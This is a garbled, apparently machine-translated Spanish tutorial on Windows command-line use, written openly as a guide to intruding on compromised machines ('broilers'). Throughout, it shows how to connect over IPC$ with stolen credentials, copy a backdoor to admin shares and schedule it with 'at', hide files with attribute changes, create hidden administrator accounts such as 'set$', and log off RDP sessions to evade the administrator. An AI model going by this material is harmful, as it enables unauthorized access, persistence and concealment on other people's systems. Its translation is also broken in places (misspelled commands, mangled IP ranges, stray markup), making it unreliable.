Comenzando con los comandos de DOS

Todos definitivamente usarán los comandos de DOS al invadir. Sus funciones son muy poderosas. Hoy daré una explicación detallada de los comandos de DOS más utilizados. Es principalmente para principiantes y aquellos que están expuestos a DOS. para amigos que tienen pocos comandos. A continuación seleccionaré algunos de los más utilizados para hablar.

Tome Windows 2000 como ejemplo, Windows XP es similar.

DIR

Muestra todas las carpetas y archivos del disco actual.

El método más común es cargar una puerta trasera o un servidor (por ejemplo, el nombre es Systems.exe) al broiler's c:\winnt\ En system32, desea ver si la carga se realizó correctamente. Puede usar el comando DIR para verificar. El comando es el siguiente:

DIR c:\winnt\system32\systems. .exe

Se mostrará:

2004-05-24 20:06 194,762 sistemas.exe

1 archivo 194,762 bytes

0 directorios 4,658,597,888 bytes disponibles

Si no realiza la carga exitosamente, la pantalla será la siguiente:

El volumen en la unidad C no tiene etiqueta.

El número de serie del volumen es 6458-3DB8

Directorio de c:\winnt\system32\

Archivo no encontrado

CD

Cambiar el directorio actual

Mira en detalle el siguiente comando:

C:\>cd winnt //Ingresa a la carpeta winnt

C:\winnt>cd system32 //Ingresa a la carpeta system32

C:\winnt\system32>cd.. //Regresa al directorio anterior

C:\ winnt> cd..

C:\>

C:\>d: //Ingrese la unidad D

D:\>e: // Ingrese la unidad E

E:\>

del y deltree

DEL: eliminar archivos.

Consulte el siguiente comando:

C:\>del c:\xx\ww.txt //Elimina el archivo llamado WW en el directorio XX de la unidad C.

C:\>

C :\>del c:\xx\*.* //Eliminar todos los archivos en el directorio XX de la unidad C

deltree

Esto es más destructivo No. solo puede eliminar todos los archivos, eliminar incluso la carpeta

C:\>deltree c:\winnt //Eliminar todos los archivos y carpetas winnt en la unidad C.

Utilice esto con precaución.

attrid

Mostrar y cambiar atributos de archivo o carpeta.

Los atributos de un archivo o carpeta están ocultos, representados por la letra H Sólo lectura, representado por R. Archivo, representado por A. Sistema, representado por S

Para cambiar un atributo de archivo o carpeta, "+" significa agregar, "-" significa eliminar un atributo.<. /p>

Por lo general, todos colocamos la puerta trasera o el servicio en c:\winnt\system32 donde se cargó el asador. Después de ingresar el CMD del asador, para evitar que el administrador del asador lo sepa, podemos ocultar lo que usted cargó. Por ejemplo, el Systems.exe anterior

El comando es el siguiente:

C:\>attrid +h c:\winnt\system32\systems.exe //De esta manera, Systems.exe no se puede encontrar en system32

C:\>attrid -h c:\winnt\system32\systems.exe //Eliminar los atributos ocultos de Systems.exe

copiar

Copie uno o más archivos a otro directorio

Por ejemplo, copie un archivo llamado 1.txt en la unidad C a la carpeta vv en la unidad D,

C:\>copiar c:\1 .txt d:\vv\1.exe

Por ejemplo, ha establecido una conexión IPC$ con el asador (¿cómo conectarse? Hablaré sobre más tarde), y el asador ha abierto *** compartir. Aquí, por ejemplo, abra la unidad D. Puede descargarlo en su unidad C.

Una puerta trasera o servidor llamado Systems.exe carga el broiler en la unidad D. El comando es el siguiente:

C:\>copiar c:\systems.exe \\broiler IP\d$

escriba

Mostrar contenido del archivo

Ahora creo un nuevo archivo llamado hack.txt en el directorio XX de mi unidad C. El contenido son algunas IP taiwanesas

El comando es el siguiente:

C:\>escriba c:\xx\hack.txt

Número de serie dirección IP inicial dirección IP final país/provincia/municipio ciudad/distrito/condado/Organización

58 024.179.140.000 024.179.150.255 Provincia china de Taiwán

80 061.013.000.000 061.013.255.255 Provincia china de Taiwán

86 061.058.065.000 061.058.07 0.255 China Provincia de Taiwán

87 061.059.160.000 061.059.255.255 Provincia de Taiwán, China

89 061.070.100.000 061.070.150.255 Provincia de Taiwán , China

1788 061.217.179.000 061.217 .179.255 Ciudad de Tainan, Provincia de Taiwán, China

1789 061.216.000.000 061.219.255.255 Provincia de Taiwán, China

1790 061.220.080.000 .220.150.255 Ciudad de Taipei, Provincia de Taiwán, China

1791 061.224 .000.000 061.224.255.255 Ciudad de Taipei, Provincia de Taiwán, China

1792 061.225.000.000 061.225.255.255 Provincia de Taiwán, China

3390 134.208.000.000 134.208.255.255 Provincia de Taiwán, China

3584 139.175.000.000 139.175.255.255 Provincia de Taiwán, China

3590 140.092.000.000 140.092. 255.255 Provincia china de Taiwán

3593 140.096.000.000 140.096.255 .255 Provincia China de Taiwán

3596 140.112.000.000 140.112.255.255 Universidad Nacional de Taiwán, Provincia China de Taiwán

C :\>

También tiene otro uso, es decir, después de ingresar el CMD del asador, mira el uso del asador. ¿Qué sistema operativo es? El comando es el siguiente. mi computadora es la siguiente:

C:\>type c:\boot.ini

[cargador de arranque]

timeout=30

predeterminado=multi(0)disco(0)rdisco(0)partición(1)\WINDOWS

[sistemas operativos]

multi(0)disco(0)rdisco( 0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"

/fastdetect

¿Puedes verlo? Yo uso

Este es un sistema XP.

Estos son algunos comandos que creo que se usan comúnmente. Otros incluyen rd, md, etc. Si está interesado, puede buscar información que se use con menos frecuencia.

ping

Este es el comando más utilizado, pero ahora parece que no funciona. La mayoría de los sitios web y computadoras personales usan firewalls para bloquear el ping. está bloqueado Comandos básicos:

ping ip

ping URL

La siguiente P es nuestro sitio web:

C:\>ping. www.hf110.com

Haciendo ping a www.hf110.com [218.89.0.231] con 32 bytes de datos:

Respuesta desde 218.89.0.231: bytes=32 tiempo=67ms TTL= 116

Respuesta de 218.89.0.231: bytes=32 tiempo=67ms TTL=116

Respuesta de 218.89.0.231: bytes=32 tiempo=66ms TTL=116

Respuesta de 218.89.0.231: bytes=32 tiempo=67ms TTL=116

Estadísticas de ping para 218.89.0.231:

Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% de pérdida),

Tiempos aproximados de ida y vuelta en milisegundos:

Mínimo = 66 ms, Máximo = 67 ms, Promedio = 66 ms

La IP de este sitio es 218.89.231, de TTL = 116. Se puede ver aproximadamente que se utiliza el sistema operativo Windows. En general, aquellos con un valor TTL de alrededor de 128 son sistemas operativos Windows y aquellos con un valor TTL de alrededor. 225 son en su mayoría sistemas Unix, pero hay casos especiales. El administrador puede modificar el valor TTL cambiando el registro.

net use

Después de obtener el nombre de usuario y la contraseña del asador. , puede utilizar este comando para realizar una conexión IPC$

net use \\broiler ip\ipc$ "password" /user:"username"

Después de que la conexión sea exitosa, cargue la puerta trasera o el servidor (por ejemplo, llamado sistemas.exe, en su unidad D).

copia D:\systems.exe \\broiler ip\c$ //Aquí debe estar abierto para compartir antes de poder cargar. De lo contrario, la carga no se podrá realizar correctamente.

net time \\broiler ip //Mira la hora del asador, es un reloj de 24 horas. Por ejemplo, son 3: 10 pm aquí está escrito como 15:10

en \\broiler ip 15:12 Systems.exe //A las 15:12, ejecute Systems.exe

Aquí, si. Si carga un troyano de rebote, puede esperar a que se conecte a usted. De hecho, durante el proceso de intrusión, hay muchos. Ocasionalmente, como el anterior, puede conectarse con éxito a través de IPC, pero es posible que no pueda ver el. broiler time a través de net time \\broiler ip. Incluso si puede ver la hora, a veces el servicio at del asador no está abierto. Incluso si está abierto, hay una puerta trasera o es posible que el servidor no tenga la oportunidad de ejecutarse. ,

Puede ser detectado por un software antivirus, por lo que es común que se produzcan fallos durante el proceso de intrusión. Si este método no funciona, se puede utilizar otro método.

net user.

Ver usuarios o crear un nuevo usuario.

Esta es una captura de pantalla en mi computadora

C:\>net user

p>

Cuenta de usuario para \\BILLGATES

-------------------------------- -------------------------------

Invitado Invitado1 Asistente de ayuda

SUPPORT_388945a0 yhkj

El comando se completó correctamente.

C:\>

Los anteriores son todos mis usuarios.

Ahora creo un nuevo usuario setwell, la contraseña es 123456, la captura de pantalla es la siguiente

C:\>net user setwell 123456 /add

El comando se completó correctamente.

C:\>net localgroup administradores setwell /add //Este comando es para agregar setwell como administrador

El comando se completó con éxito.

A continuación veremos el usuario de red, la imagen es la siguiente

C:\>usuario de red

\\cuenta de usuario de BILLGATES

-------------------------------------------------- --------------

Invitado invitado1 Asistente de ayuda

setwell SUPPORT_388945a0 yhkj

El comando se completó correctamente.

El usuario creado se puede ver con el comando net user. Agregamos un $ después del usuario para ocultarlo un poco. Esta vez creamos un usuario llamado set. La captura de pantalla es la siguiente:

C:\>net user set$ 123456 /add

El comando se completó correctamente.

C:\>net localgroup Administrators set$ /add

El comando se completó correctamente.

C:\>net user

\\Cuenta de usuario de BILLGATES

----------------- ----------------------------------------

Invitado invitado1 Asistente de ayuda

setwell SUPPORT_388945a0 yhkj

El comando se completó correctamente.

C:\>

¿Viste eso? No vimos el conjunto de usuarios$ que acabamos de crear. Puedes usar este comando para ver, administradores de grupo local neto. Este comando muestra. todos los administradores, captura de pantalla a continuación:

C:\>administradores de grupos locales de red

Administradores de alias

Nota Los administradores tienen acceso completo sin restricciones a la computadora/dominio Quan

Miembro

---------------------------------- - -------------------

invitado1

conjunto$

conjuntobien

yhkj

El comando se completó exitosamente.

C:\>

¿Lo viste? Vimos el usuario set$.

Si deseas eliminar el usuario, usa este comando:

C:\>net user setwell /delete

net start

1 Iniciar algunos servicios

Por ejemplo: net start telnet /. /Iniciar servicios telnet

2. Verifique qué servicios están iniciados actualmente. Verifique qué servicios están iniciados en mi computadora:

C:\>net start

El Se han iniciado los siguientes servicios de Windows:

Actualizaciones automáticas

Sistema de eventos COM+

Servicios criptográficos

Cliente DHCP

Cliente de seguimiento de enlaces distribuidos

Cliente DNS

Servicio de informes de errores

Registro de eventos

Ayuda y soporte técnico

Servicios IPSEC

Administrador de discos lógicos

Messenger

Esto es sólo una parte del servicio.

net stop

Detener algunos servicios. Ya lo mencioné hoy. No me queda mucho.

net share

Ver los recursos compartidos *** predeterminados. marque estos *** recursos compartidos C$ D$ e$ f$ admin$ ipc$, este es el valor predeterminado del sistema. El mío está todo apagado,

voy al asador para tomar una captura de pantalla.

p>

C:\Documentos y configuraciones\Administrador>net share

D$ D:\ Default *** share

F$ F:\ Default *** share

ADMIN$ C:\WINNT gestión remota

C$ C:\ Predeterminado *** Compartir

E$ E:\ Predeterminado *** Compartir

El comando se completó exitosamente.

C:\Documents and Settings\Administrator>

El beneficio IPC$*** de este asador está desactivado.

vista de red

También es una vista para compartir, pero no es la vista para compartir predeterminada anterior. Tomemos una captura de pantalla. También es una vista de red broiler,

C:\Documents and Settings\Administrator.

Comentarios del nombre del servidor

------------------------------- --- -----------------------------------------------

\\17

\\HMZ

\\ZGH

El comando se completó correctamente.

C:\Documents and Settings\Administrator>

Aprender los comandos de DOS puede parecer un poco molesto, pero en realidad es bastante fácil de aprender y si lo aprendes bien, lo será. Juega un papel decisivo en la invasión. La próxima vez hablaremos sobre netstat y otros comandos.

netstat -an

Utilice este comando para ver todas las conexiones a la máquina. en la captura de pantalla en mi computadora,

D:\>netstat -an

Conexiones activas

Proto Dirección local Estado de dirección extranjera

TCP 0.0.0.0:135 0.0 .0.0:0 ESCUCHANDO

TCP 0.0.0.0:1025 0.0.0.0:0 ESCUCHANDO

TCP 0.0.0.0:1029 0.0.0.0:0 ESCUCHANDO

ESTABLECIDO

UDP 0.0.0.0:500*:*

UDP 0.0.0.0:1035*:*

UDP 0.0. 0.0:1037 *:*

UDP 0.0.0.0:1134 *:*

UDP 0.0.0.0:1136 *:*

Proto dirección local Dirección extranjera Estado

Protocolo puerto local y dirección IP Estado del puerto remoto y dirección IP

ESCUCHA El estado de escucha significa esperar a que la otra parte se conecte

ESTABLECIDO Conectándose.

ESTABLECIDO Conectándose.

El protocolo TCP es TCP

El protocolo UDP es UDP

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLECIDO

Esto significa usar el protocolo tcp ip nativa (218.95.49.187 a través del puerto: 2935 e ip remota (218.89.0.231) puerto: 80 conexión

consulta

Este comando solo abre el puerto 3389 (el puerto no es necesariamente 3389, tal vez se pueda cambiar a otra cosa) El puerto. Estrictamente hablando, debe usarse si el servicio de terminal remoto está activado. Usé un nombre de usuario de 1$ para iniciar sesión en una máquina 3389. la captura de pantalla:

c:\> consulta usuario

NOMBRE DE USUARIO NOMBRE DE SESIÓN ID ESTADO

consola de administrador 0 en ejecución

1$ rdp-tcp #2 1 Ejecutando

Ver Si no ha ido a lo anterior, el administrador está aquí. Si desea salir, use el siguiente comando:

logoff ID aquí es logoff. 1.

Esta es una salida normal. Hablando de salir.

Hay otra manera, que es ir a Inicio---Apagar---Cerrar sesión 1$. Si usa otro método para cerrar sesión, cuando se apague el asador, aparecerá algo como "Otro invitado inició sesión en este servidor". "Aparecerá. Si cierra sesión, los datos de la sesión de la otra parte se perderán. Entonces el administrador lo descubrirá.